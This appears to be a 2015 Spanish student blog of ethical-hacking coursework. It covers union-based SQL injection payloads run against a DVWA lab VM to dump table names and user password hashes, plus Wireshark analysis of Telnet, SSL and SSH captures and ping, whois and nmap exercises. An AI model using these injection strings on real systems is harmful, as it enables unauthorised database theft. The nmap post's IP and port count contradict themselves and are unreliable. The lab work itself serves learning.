martes, 6 de octubre de 2015

Unidad 2 Tarea#2 SQL Injection



¿Que es SQL injection?



Es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos.

El origen de la vulnerabilidad radica en el incorrecto chequeo o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o script que esté embebido dentro de otro.

Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de incrustar código SQL intruso y a la porción de código incrustado.

Para llevar acabo esta tarea, primero se instaló el virtual box, se procedió con su instalación y se inició la máquina virtual para poder visualizar la dirección IP.



Una vez obtenida la IP, se realizó los paso del articulo 7,8 y 9 de ESTE ARTÍCULO.


Entramos a la dirección 192.168.56.101/login.php
ID: admin
Password: password

Y entramos a la siguiente página.

Login DWA



Security Level


Una vez ahí hacemos click en DWA Security



Manual SQL Injection

Luego seleccionamos SQL Injection


Ingresamos los siguientes comandos de base de datos

  • %' or '0'='0
  • %' or 0=0 union select null, version() #
  • %' or 0=0 union select null, user() #
  • %' or 0=0 union select null, database() #
  • %' and 1=0 union select null, table_name from information_schema.tables #
  • %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
  • %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
  • %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #





Conclusión: El servidor no esta protegido para este tipo de ataques, por lo cual revela información comprometedora.



















sábado, 3 de octubre de 2015

Unidad 2 Tarea# 1 Capturando tráfico con wireshark



Whireshark

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones, para desarrollo de software y protocolos, y como una herramienta didáctica.
En esta tarea no vamos a realizar capturas en vivo de tráfico, sino que vamos a analizar trazas (capturas) ya realizadas con anterioridad y salvadas en archivos. En este caso, vamos a usar la traza telnet-raw.pcap, del repositorio de capturas disponible en Wireshark.
Analizando un protocolo inseguro de Telnet 




Como puedes ver, la elección de una aplicación no segura como Telnet puede llevar a la difusión de información importante, como información de acceso, sistemas operativos, etc., en este caso a través del tráfico intercambiado.


¿Que usuario y contraseña se ha usado para acceder al servidor de Telnet?

Usuario: faker
Contraseña: user

¿Que sistema operativo corre en la máquina?

OpenBSD/i386

¿Que comandos se ejecutan en la sesión?

ls
ls -a
sbin/ping 
exit




Analizando SSL

Para la realización de este ejercicio, descarga esta traza con tráfico SSL y abrela con Wireshark. SSL es un protocolo seguro que utilizan otros protocolos de aplicación como HTTP. Usa certificados digitales X.509 para asegurar la conexión.

¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?

Trama 2 emite el certificado




¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?

Para esto en la siguiente imagen vemos que algunas partes están cifradas y otras no.


Autoridad que ha emitido el certificado: versign




¿Qué asegura el certificado, la identidad del servidor o del cliente?

La identidad del servidor




Analizando SSH


En la primera parte de este ejercicio hemos visto un protocolo no seguro, como Telnet. Una alternativa a usar Telnet a la hora de conectarnos a máquinas remotas es SSH, que realiza una negociación previa al intercambio de datos de usuario. A partir de esta negociación, el tráfico viaja cifrado. Descarga esta traza con tráfico SSH y abrela con Wireshark.


¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?

Los paquetes cifrados empiezan desde el paquete 20



¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?

Los protocolos que viajan cifrados son los SSHV2, desde el paquete 20.




¿Es posible ver alguna información de usuario como contraseñas de acceso?

Al estar la información cifrada, no es posible obtener información sobre contraseñas y usuarios.









Tarea #3 Criptografía



Una pequeña muestra de como encriptar y desencriptar un documento o archivo mediante el software kleopatra.

miércoles, 23 de septiembre de 2015

Tarea#2  Búsqueda y puesta en común de recursos

Fuentes confiables sobre Seguridad informática


http://kinomakino.blogspot.com.es/

http://www.hacktimes.com/


                                                         
 http://hacking-etico.com/


                                                                       
                  Recomiendo este libro escrito por Karina Astudillo. 
            Se encuentra disponible en Amazon


Redes Sociales y foros


http://www.forospyware.com/seguridad-informatica/
http://www.hackhispano.com/


   

Tarea#1 Hacking Ético -. Herramientas Ping, Whois y Nmap

Hacking Ético.-

¿Qué es?

Un hácker ético es aquel que trata de usar las técnicas que usan los háckers para atacar nuestros sistemas, con el objetivo de aprender estas técnicas y proteger nuestros activos. El hácker ético conoce las técnicas que usan los háckers y las utiliza para detectar las vulnerabilidades que tiene un sistema y corregirlas. Un buen hácker tiene conocimiento sobre programación, sistemas y redes de computadores e ingeniería social, es un auditor de seguridad, De hecho muchos háckers trabajan como auditores de seguridad.

Con la ingeniería social se trata de obtener datos, información del eslabón mas débil de la seguridad informática. Que somos nosotros, las personas.

El cibercrimen 

Los ataques en la internet están creciendo continuamente el objetivo final muchas veces es económico, y las motivaciones pueden ser muchas, cómo, acceso a información privilegiada, robos de contraseñas, acceso a cuentas en internet (bancos, redes sociales, correos, etc..), ataque a servidores de empresas para que dejen de prestar sus servicios, ataque a cientos o miles de computadores personales. 

En algunos casos, el objetivo de los ataques son para empresas y sus redes corporativas y en otros casos a computadores personales. En realidad cualquier sistema que este conectado a internet es susceptible a cualquier ataque. Si piensas que tu empresa no a sufrido ningún ataque es porque en realidad no te has enterado de ellos.



PING: El objetivo de un ping es determinar si un host destino, identificado con una determinada IP, es accesible desde otro host. Para ello, el host origen envía al host destino un paquete de información de 32 bytes mediante el protocolo ICMP y espera una contestación de éste, que debe contener los mismos datos. Si la respuesta llega correctamente, el ping ha sido satisfactorio. Si por el contrario el ping falla, entonces es que o bien la petición del host origen o bien la respuesta del host destino se han perdido por el camino.

Host usado: www.google.com.ec





El ping nos confirma que ha enviado cuatro paquetes de tamaño 32 bytes al servidor que hemos seleccionado, en este caso www.google.com.ec, y que a ese servidor le corresponde la IP 74.125.26.94 .En este caso el ping ha sido satisfactorio, los cuatro paquetes de prueba han llegado correctamente y han vuelto a nuestro ordenador con un tiempo medio de 99ms.

Para evitar que una petición ping viaje de forma ilimitada por internet, en cada una de ellas se establece un Time To Live (TTL), que representa el número de saltos que ha dado el paquete de host en host por internet hasta alcanzar su destino.

Ping es un comando muy sencillo pero también con varias opciones para personalizar los resultados. A continuación las opciones disponibles en la siguiente tabla.





Whois: Whois es un comando que busca en la base de datos "quién es" para obtener información sobre el propietario de un nombre de dominio en particular. La información proporcionada puede incluir el nombre, dirección, correo electrónico y número de teléfono. El comando Whois también devolverá los servidores de nombres y la información de una determinada situación.








Nmap: Es un programa de código abierto que sirve para rastrear puertos, acontinuación escogí el host www.facebook.com, Ip del servidor 8.8.8.8.


El resultado del scan arrojó que existen 4 puertos abiertos, 80, 443, 843


Topología